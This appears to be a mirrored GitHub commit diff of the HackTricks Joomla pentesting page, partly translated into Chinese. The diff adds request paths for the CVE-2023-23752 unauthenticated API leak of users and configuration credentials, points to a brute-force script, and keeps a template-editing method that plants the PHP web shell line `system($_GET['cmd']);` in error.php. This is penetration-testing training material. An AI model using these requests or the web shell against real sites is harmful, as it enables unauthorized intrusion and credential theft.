mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-15 09:27:32 +00:00
Translated ['network-services-pentesting/pentesting-web/joomla.md'] to c
This commit is contained in:
parent
b6ab3be194
commit
6b24c9b3e3
1 changed files with 30 additions and 19 deletions
|
@ -4,10 +4,10 @@
|
|||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* 您在**网络安全公司**工作吗? 想要看到您的**公司在HackTricks中宣传**吗? 或者想要访问**PEASS的最新版本或下载PDF格式的HackTricks**吗? 请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 您在**网络安全公司**工作吗? 想要看到您的**公司在HackTricks中做广告**吗? 或者您想要访问**PEASS的最新版本或下载PDF格式的HackTricks**吗? 请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 发现我们的独家[NFTs收藏品**The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
||||
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我的 **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
||||
* **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我的 **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
||||
* **通过向[hacktricks repo](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享您的黑客技巧**。
|
||||
|
||||
</details>
|
||||
|
@ -68,29 +68,31 @@ curl https://www.joomla.org/ | grep Joomla | grep generator
|
|||
|
||||
## Joomla
|
||||
|
||||
### Joomla Configuration File
|
||||
### Introduction
|
||||
|
||||
The Joomla configuration file `configuration.php` contains sensitive information such as database credentials and secret keys. It is located in the root directory of the Joomla installation.
|
||||
Joomla is a popular Content Management System (CMS) that is used to build websites and online applications. It is important to pentest Joomla websites to identify and fix security vulnerabilities.
|
||||
|
||||
### Finding Joomla Configuration File
|
||||
### Pentesting Joomla
|
||||
|
||||
To find the Joomla configuration file, you can use various methods such as:
|
||||
When pentesting Joomla websites, some common vulnerabilities to look for include:
|
||||
|
||||
1. **Manual Inspection**: Look for `configuration.php` in the root directory of the Joomla installation.
|
||||
|
||||
2. **Automated Tools**: Tools like `Joomscan` can help in identifying the Joomla configuration file.
|
||||
1. Outdated Joomla versions: Check if the Joomla version is outdated and vulnerable to known exploits.
|
||||
2. Insecure Joomla extensions: Vulnerabilities in third-party extensions can be exploited to compromise the website.
|
||||
3. Weak administrator passwords: Brute forcing or guessing weak passwords can give unauthorized access to the Joomla admin panel.
|
||||
4. SQL injection: Joomla websites can be vulnerable to SQL injection attacks if input validation is not properly implemented.
|
||||
5. File inclusion vulnerabilities: Check for file inclusion vulnerabilities that can be exploited to execute malicious code on the server.
|
||||
|
||||
### Joomla Configuration File Structure
|
||||
### Tools for Pentesting Joomla
|
||||
|
||||
The Joomla configuration file has a specific structure that includes database connection settings, secret keys, and other configuration options. Understanding this structure is crucial for extracting valuable information during a penetration test.
|
||||
Some tools that can be used for pentesting Joomla websites include:
|
||||
|
||||
### Exploiting Joomla Configuration File
|
||||
- **JoomScan**: A tool specifically designed for Joomla pentesting, it can scan Joomla installations for security vulnerabilities.
|
||||
- **OWASP ZAP**: An intercepting proxy tool that can be used to find security vulnerabilities in Joomla websites.
|
||||
- **SQLMap**: A popular tool for detecting and exploiting SQL injection vulnerabilities in Joomla and other web applications.
|
||||
|
||||
Once you have access to the Joomla configuration file, you can extract sensitive information like database credentials, secret keys, and other configuration details. This information can be used to further exploit the Joomla application or escalate privileges on the target system.
|
||||
### Conclusion
|
||||
|
||||
### Protecting Joomla Configuration File
|
||||
|
||||
To protect the Joomla configuration file from unauthorized access, ensure that proper file permissions are set. Restrict access to the file using secure configurations and regularly monitor for any unauthorized changes.
|
||||
Pentesting Joomla websites is crucial to ensure the security of the website and protect against potential cyber attacks. By identifying and fixing vulnerabilities, website owners can prevent unauthorized access and data breaches.
|
||||
```
|
||||
1- What is this?
|
||||
* This is a Joomla! installation/upgrade package to version 3.x
|
||||
|
@ -106,7 +108,16 @@ To protect the Joomla configuration file from unauthorized access, ensure that p
|
|||
```bash
|
||||
droopescan scan joomla --url http://joomla-site.local/
|
||||
```
|
||||
### Brute-Force
|
||||
### API未经身份验证的信息泄露:
|
||||
版本从4.0.0到4.2.7存在未经身份验证的信息泄露漏洞(CVE-2023-23752),将导致凭据和其他信息泄露。
|
||||
|
||||
- 用户:`http://<host>/api/v1/users?public=true`
|
||||
|
||||
- 配置文件:`http://<host>/api/index.php/v1/config/application?public=true`
|
||||
|
||||
**MSF模块**:`scanner/http/joomla_api_improper_access_checks`或ruby脚本:[51334](https://www.exploit-db.com/exploits/51334)
|
||||
|
||||
### 暴力破解
|
||||
|
||||
您可以使用此[脚本](https://github.com/ajnik/joomla-bruteforce)尝试对登录进行暴力破解。
|
||||
```shell-session
|
||||
|
@ -116,11 +127,11 @@ admin:admin
|
|||
```
|
||||
## RCE
|
||||
|
||||
如果你成功获取了**管理员凭证**,你可以通过添加一小段**PHP代码**来实现**RCE**。我们可以通过**自定义**一个**模板**来实现这一点。
|
||||
如果您成功获取了**管理员凭据**,您可以通过添加一小段**PHP代码**来在其中获得**RCE**。我们可以通过**自定义**一个**模板**来实现这一点。
|
||||
|
||||
1. 在`Configuration`下方点击**`Templates`**以打开模板菜单。
|
||||
2. 点击一个**模板**名称。让我们选择`Template`列标题下的**`protostar`**。这将带我们到**`Templates: Customise`**页面。
|
||||
3. 最后,你可以点击一个页面以查看**页面源代码**。让我们选择**`error.php`**页面。我们将添加一个**PHP 一行代码来执行代码**,如下所示:
|
||||
3. 最后,您可以点击一个页面以查看**页面源代码**。让我们选择**`error.php`**页面。我们将添加一个**PHP一行代码以获得代码执行**,如下所示:
|
||||
```php
|
||||
system($_GET['cmd']);
|
||||
```
|
||||
|
|
Loading…
Reference in a new issue